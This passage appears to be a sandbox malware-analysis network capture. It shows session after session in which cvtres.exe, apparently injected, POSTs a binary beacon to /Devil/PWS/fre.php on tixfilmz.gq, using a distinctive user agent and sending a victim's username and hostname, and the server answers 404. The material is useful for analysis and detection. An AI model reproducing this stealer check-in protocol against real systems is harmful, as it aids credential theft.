Aug 11, 2022 06:42:55.514800072 CEST	1267	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tfWHw3Y7kyqn%2F4%2B1%2B7SsB4DAFkWwDMis5E17WBWPeB%2B1y3Yz03f8Y%2FFfLTVCggCzJy4tne%2BaNzObkADXLk7hgGQ0oEnf93MB%2BBBpZYsnzAcE0T0at%2F0D%2BYqTVnup8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4eb05c1f9a03-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.3	49790	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:56.651534081 CEST	1268	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:56.668574095 CEST	1269	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:56.784835100 CEST	1269	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Da0vd73KcmCTeEN%2BL%2FYCdduFmS4E%2FXVcmHKEeTqY%2BAc5PKMghAzTybst0WOO9BHlZaawlYj7DAXooADXC6OTMEvQCxVbFsBFdWZJdaHCwlev49UDMsvp3BmP5%2F0nYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4eb818af9125-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.3	49791	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:58.117985964 CEST	1270	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:58.135077000 CEST	1270	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:58.219897032 CEST	1271	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZrTeGoF3nVYrkeUhvxWoh9%2FRj%2BhzIrdJ72hwRm%2FxaYpomKIxqw1dSkapXe2%2FFFdZMPIoGcvl6mo9%2BrEob%2BGb%2BKOz8%2FDFTjZsBY8cTnoBJamVqmyew15WcilG2H%2Fhwg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ec14b8790ee-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.3	49792	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:59.404300928 CEST	1272	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:59.421533108 CEST	1272	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:59.501753092 CEST	1273	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LWjiKYUlgHWx9Pm7GKhgqpidlITqIADQyq1TP9zHBOHabXDileoLfhOJYU89jDeWU1D%2Br5cDTxfRYL3B8GPfifjuyc8DSSD71ocPRwJOZpnoHF%2FboHrn2acvE8UDzQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ec94defbbe9-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.3	49793	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:00.645450115 CEST	1274	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:00.662642956 CEST	1274	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:00.737303972 CEST	1275	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u1dKGquQ9Ixx8o9iJKj1wlKWK5rPFLMBf4%2FyMkIxmpMjc07V8KaBqcSKkZ4KNfyS5RxQ4J0zBYSzGTXjjjoRfC6Y7ISEYFRnMhhWIOfRQ5yilBTZD9ZKETYJbLkvmg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ed10a599b69-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.3	49794	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:01.964847088 CEST	1276	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:01.981728077 CEST	1276	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:02.082334042 CEST	1277	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8X6KQo82dYkatS%2BcBCkdyTBkDNWeGRqdd9pSC75IbqP2uZAs2ygYPWwCHYoZqrUk2%2FKbMp1Les9sU48HHI6vyy6krxsVLeQedAFir4dZ8v1j7KvRuBSSi3r1r83bOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ed94e67902e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.3	49795	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:03.020333052 CEST	1277	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:03.038050890 CEST	1278	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:03.112765074 CEST	1278	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0m%2FfS5ISGxmLW63DwLudSt8bkBntVmSAwl1fBlZ0AsApI%2F6mm4%2FdqtsRSd5HAWP4gSmqm9Y0IShDOB%2FpEXiFJB6pDV6MV%2F1FJRhLnCOeDkja8t9ABhEPQBEZL7Blg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4edfe85bbbad-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.3	49796	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:04.193279028 CEST	1279	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:04.210558891 CEST	1280	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:04.301268101 CEST	1280	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KtP2dy8fexlaQThIyiOsAFsHqq%2B0ttUQMUtf%2Bo%2FhUnDVInUFReffpo44QRssr5EEPVJw5ND6LgqEgv8sldjt%2FRC%2FBYUnBVXjfLNR5TtOLJKPq%2FDp2uXFfn2FX4H17Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ee73cf3908a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49746	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:17.452589035 CEST	1033	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:17.469538927 CEST	1034	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:17.548320055 CEST	1034	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WSuTK3xmdvnC9SqK9C3Kq8XKsdf7rSOiPJ%2B%2B9ZxDB06tiwdevw3TNAATZmNMvGVEVg9KMwbf3%2BoFJ2siKx%2BGf5kYUXLsWwINIX3uVE6oCo9rZDzlcazlVHOgpMj%2Bzg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dc31d919156-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.3	49797	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:05.379364967 CEST	1281	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:05.396261930 CEST	1281	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:05.476572037 CEST	1282	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9GykN9H5C7%2B6kWPZx2X1%2BpZinTzXp8bAAQqxyfjP6njGhWPbrJNJaRrV3nnXYbTuBLFh3TX4kkZicXXiyW5kQR%2F0ajt%2BmPUI5Kky386fZaDzStfpDzTH2G%2F%2FCKgimQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4eeeaa9d9b98-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.3	49798	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:06.576802969 CEST	1283	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:06.594121933 CEST	1283	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:06.684562922 CEST	1284	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pGkIqTGlsgGgUzc8cR7P5DXM0Hs0xrf0h9je1L794WzRUJtN87MZfypcbWS5KD0wUcbSeNPgGa2aZHScra0ejYprzq6oZKXQPb0CAQ6BhxysZgb7gE0Cjgu1Vi9jhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ef629a168fb-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.3	49800	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:08.046751976 CEST	1290	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:08.063824892 CEST	1290	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:08.138412952 CEST	1291	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hE8CEzQWdj3ptK9qhN6wg81emsfTMM%2BEqmWsHsEIHSx7zlSJOmGskVlCQQrDAtzBvBLuoUJZLgjzpSNXiyg%2FPViPlWuyFG8Xo%2BdfrVjRID5Sr1Jx61DE44vxJamumA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4eff5b029b5b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.3	49805	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:09.287220955 CEST	1303	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:09.304119110 CEST	1303	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:09.410331011 CEST	1306	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=myILvYJYcfKS7MkYcbRG7vfOYUs1um%2Fkhr6%2BNFQpqnaIxzcDc93pXsiCMCUeiqAi3OLfzM7VZ7iHLQbmcmlQRRv0LcFVg3u%2F2o%2Fw93WkjLjKm2kg%2FB43169nVbjkFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f07191bbc01-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.3	49811	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:10.662100077 CEST	1317	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:10.680753946 CEST	1317	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:10.766151905 CEST	1319	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GClypDL1lKCXN2yvye0LTL8dLrQVneuX5HUY5VQrCen5Qm0qiJd%2BWTJnBJ2Trt6Htcycx%2FlEeEVgr2D%2BKJB8BaDOT6UZdLhqzLazSRJpXJRs2xehSPM2ek9AukQTlw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f0fadac8fef-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.3	49817	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:11.901227951 CEST	1330	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:11.918181896 CEST	1331	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:12.004159927 CEST	1336	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5UewRXvDfKp%2BiAauIxctOcyUA15rOOQqfcD2aL7Td1VXhCzbbOIRwUYQfH5mwqygnMaghTVhJQxczEYISVU212%2BV9pxAhaafapkIK5nFaWBgkFiZJtv4DxF9vc83pg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f1768579013-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.3	49823	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:13.321407080 CEST	1385	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
